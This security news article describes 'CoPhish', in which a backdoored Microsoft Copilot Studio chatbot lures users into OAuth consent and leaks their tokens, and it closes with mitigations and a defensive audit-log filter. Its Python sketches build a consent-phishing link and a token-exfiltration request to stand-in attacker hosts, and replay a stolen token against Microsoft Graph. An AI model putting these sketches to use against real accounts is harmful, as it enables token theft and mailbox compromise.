CoPhish Attack Exploits Microsoft Copilot Studio
A novel phishing technique known as CoPhish leverages Microsoft Copilot Studio to trick users into unwittingly granting attackers access to their Microsoft Entra ID accounts.
Discovered by Datadog Security Labs, the technique uses custom AI agents hosted on legitimate Microsoft domains, dressing up traditional OAuth consent attacks to appear benign and thereby sidestepping user skepticism.
The attack, detailed in a recent report, highlights persistent vulnerabilities in cloud-based AI tools despite Microsoft's ongoing efforts to harden consent protocols.
By exploiting Copilot Studio's customizability, attackers can build seemingly innocuous chatbots that prompt users to log in and then steal the resulting OAuth tokens. Those tokens enable malicious actions, including unauthorized access to email and calendar data.
The development comes amid rapid advances in AI services, where user-customizable features designed for productivity can inadvertently facilitate phishing. The growing adoption of tools like Copilot demands closer oversight of low-code platforms.
OAuth consent attacks, classified under MITRE ATT&CK technique T1528, trick users into approving deceptive app registrations that request broad permissions to sensitive data.
Within Entra ID environments, attackers create app registrations targeting Microsoft Graph resources such as email and OneNote, then direct victims to consent via deceptive phishing links.
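The deceptive link at the heart of such an attack is an ordinary Entra ID authorize URL pointing at the attacker's app registration. A rough sketch of how one is assembled (the client_id and redirect_uri below are placeholders, not values from the reported attack):

```python
from urllib.parse import urlencode

# Illustrative sketch of an OAuth consent-phishing URL (T1528).
# The client_id and redirect_uri are placeholders, not real values.
def build_consent_link(tenant: str, client_id: str,
                       redirect_uri: str, scopes: list[str]) -> str:
    params = {
        "client_id": client_id,        # attacker's app registration
        "response_type": "code",
        "redirect_uri": redirect_uri,  # attacker-controlled endpoint
        "scope": " ".join(scopes),     # requested Graph permissions
    }
    return (f"https://login.microsoftonline.com/{tenant}"
            f"/oauth2/v2.0/authorize?{urlencode(params)}")

link = build_consent_link(
    "common",
    "00000000-0000-0000-0000-000000000000",
    "https://evil.example/callback",
    ["Mail.ReadWrite", "Calendars.ReadWrite"],
)
```

Because the victim lands on a genuine login.microsoftonline.com page, only the requested permissions list hints that anything is wrong.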
Once approved, the resulting token lets the attacker impersonate the victim, opening the door to data exfiltration or further compromise.
Despite Microsoft's hardening efforts, including restrictions on unverified applications in 2020 and a July 2025 update that makes "microsoft-user-default-recommended" the default policy, blocking consent to high-risk permissions without admin approval, significant gaps persist.
Unprivileged users can still consent to permissions such as Mail.ReadWrite and Calendars.ReadWrite for internal apps, while administrators holding roles such as Application Administrator can grant permissions for any application.
A further policy change scheduled for late October 2025 is expected to narrow these gaps, but it will not fully protect privileged users.
Mechanics of CoPhish: Malicious Copilot Creation
In the CoPhish technique, attackers build a malicious Copilot Studio agent, a customizable chatbot, using either a trial license in their own tenant or a compromised one, according to Datadog.
The agent's "Login" topic, a standard authentication workflow, is backdoored with an HTTP request that exfiltrates the user's OAuth token to an attacker-controlled server after consent.
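Conceptually, the backdoored step is a post-login HTTP callout that forwards the captured token. A minimal sketch of that logic, noting that the collector URL is hypothetical and that in the real attack this is configured inside the agent's Login topic rather than written as code:

```python
import json
import urllib.request

# Hypothetical illustration of the exfiltration step: after the user
# authenticates, the agent forwards the OAuth token to a server the
# attacker controls. COLLECTOR_URL is a placeholder.
COLLECTOR_URL = "https://collector.evil.example/token"

def build_exfil_request(token: str) -> urllib.request.Request:
    """Build (without sending) the POST that would carry the token out."""
    body = json.dumps({"access_token": token}).encode()
    return urllib.request.Request(
        COLLECTOR_URL,
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )

req = build_exfil_request("eyJhbGciOi...")
```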
In addition, the demo website feature publishes the agent at a URL resembling copilotstudio.microsoft.com, mimicking legitimate Copilot services and evading cursory domain checks.
The attack begins when a victim clicks a shared link, sees a familiar interface with a "Login" button, and is redirected to the malicious OAuth flow.
For internal targets, the application requests scopes users are allowed to consent to, such as Notes.ReadWrite; for admin-level users, it may request a far broader set of permissions, including restricted ones.
Following consent, a validation code from token.botframework.com completes the process. The token, however, is transmitted covertly, often via Microsoft's own IP addresses, hiding it from the victim's traffic logs.
Attackers can then use the token to send phishing emails or steal sensitive data without the victim noticing. A diagram in the report illustrates this flow, showing the agent issuing tokens to the attacker after consent.
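Once in hand, a delegated token is replayed through ordinary Microsoft Graph calls. A sketch of what such a request looks like (the Graph base URL and Bearer scheme are standard; the token value is fake):

```python
# Sketch: replaying a stolen delegated token against Microsoft Graph.
GRAPH = "https://graph.microsoft.com/v1.0"

def graph_request(token: str, resource: str) -> dict:
    """Assemble (without sending) the request an attacker would use
    to read victim data with a consented delegated token."""
    return {
        "method": "GET",
        "url": f"{GRAPH}/{resource}",
        "headers": {"Authorization": f"Bearer {token}"},
    }

# With Mail.ReadWrite consented, /me/messages exposes the victim's mailbox.
req = graph_request("eyJhbGciOi...", "me/messages")
```

The request is indistinguishable from legitimate client traffic, which is why consent-phishing tokens are so hard to spot after the fact.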
Recommended Mitigations

To mitigate the risk posed by CoPhish, security experts recommend implementing custom consent policies stricter than Microsoft's defaults, disabling user app creation, and monitoring Entra ID audit logs for suspicious consents or modifications to Copilot agents.
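Consent grants do land in the Entra ID audit log, so defenders can flag them there. A rough sketch, assuming the audit entries have been exported as JSON records; the field names loosely mirror the Graph directoryAudits shape but should be treated as assumptions and adapted to your export format:

```python
# Sketch: flag suspicious consent grants in exported Entra ID audit
# records. Field names ("activityDisplayName", "grantedScopes",
# "appDisplayName") are assumptions here; adapt to your export format.
RISKY_SCOPES = {"Mail.ReadWrite", "Calendars.ReadWrite", "Notes.ReadWrite"}

def flag_consents(records: list[dict]) -> list[dict]:
    """Return consent-grant records that include high-risk scopes."""
    flagged = []
    for rec in records:
        if rec.get("activityDisplayName") != "Consent to application":
            continue
        if set(rec.get("grantedScopes", [])) & RISKY_SCOPES:
            flagged.append(rec)
    return flagged

sample = [
    {"activityDisplayName": "Consent to application",
     "grantedScopes": ["Mail.ReadWrite"], "appDisplayName": "HelpBot"},
    {"activityDisplayName": "Update application",
     "grantedScopes": [], "appDisplayName": "HR Portal"},
]
hits = flag_consents(sample)
```

Alerting on every "Consent to application" event, not just risky scopes, is a reasonable stricter posture in smaller tenants.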
The incident is a stark reminder for the emerging AI platform landscape: the same features that enable customization amplify risk when tied into identity systems.
As cloud services grow, organizations must prioritize robust consent policies to defend against such hybrid threats.
Source link: Cybersecuritynews.com.